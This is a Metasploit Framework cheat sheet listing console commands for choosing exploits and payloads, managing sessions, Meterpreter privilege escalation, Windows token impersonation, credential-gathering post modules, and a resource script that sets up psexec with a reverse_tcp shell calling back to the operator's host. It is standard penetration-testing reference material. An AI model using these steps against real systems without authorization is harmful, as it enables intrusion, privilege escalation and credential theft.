Metasploit Framework (MSF)
The world’s most used penetration testing framework Metasploit

Start

Start db
1
msfdb start
Copied!
or
1
systemctl start postgresql
Copied!
Start metasploit framework console
1
msfconsole
Copied!

Exploits

Select exploit
1
use <exploit>
Copied!
Run exploit
1
run
Copied!
or
1
exploit
Copied!

Options

Show options
1
show options
Copied!
Show advanced options
1
show advanced
Copied!
Set option
1
set <option> <value>
Copied!
Set option (global)
1
setg <option> <value>
Copied!

Payloads

Show payloads
1
show payloads
Copied!
Select payload
1
set payload <payload>
Copied!

Sessions

Show sessions
1
sessions -h
Copied!
Interact with session
1
sessions <number>
Copied!
Send session to background
1
background
Copied!

Meterpreter

The shell command will present you with a standard shell on the target system.
1
shell
Copied!
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
1
getsystem
Copied!

Encoders

Show encoders
1
show encoders
Copied!
Select encoder
1
set encoder <encoder>
Copied!

Misc

Search for exploits
1
search <term>
Copied!
Go back
1
back
Copied!
Display help
1
help
Copied!
Get info about current context?
1
info
Copied!
1
show auxiliary
Copied!

Multi/handler

Just start listener
1
use exploit/multi/handler
Copied!

Jobs

Start job in background
1
run -j
Copied!
Show jobs
1
jobs
Copied!

Post exploitation

This module suggests local meterpreter exploits that can be used.
1
use post/multi/recon/local_exploit_suggester
Copied!
This module extracts the plain-text Windows user login password in Registry.
1
use post/windows/gather/credentials/windows_autologin
Copied!
This module will login with the specified username/password and execute the supplied command as a hidden process.
1
use post/windows/manage/run_as
Copied!

Meterpreter session

Upgrade shell to meterpreter shell
1
post/multi/manage/shell_to_meterpreter
Copied!
Migrate to other (e.g. more stable) process
1
migrate
Copied!
Get system info
1
sysinfo
Copied!
Port forwarding
1
portfwd add -l <port> -r 127.0.0.1 -p <port>
Copied!

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.
1
whoami /priv
Copied!
Load incognito module and list available tokens
1
load incognito
2
list_tokens -g
Copied!
Impersonate e.g. BUILTIN\Administrators
1
impersonate_token "BUILTIN\Administrators"
Copied!
Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).
1
ps
2
migrate <pid>
Copied!

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.
1
msfconsole -r demo.rc
Copied!

demo.rc

1
use exploit/windows/smb/psexec
2
set rhost <ip>
3
set smbuser Administrator
4
set smbpass <hash-or-password>
5
set smbdomain <domain>
6
set payload windows/meterpreter/reverse_tcp
7
set AutoRunScript post/windows/manage/smart_migrate
8
setg lport 443
9
setg lhost <own-ip>
Copied!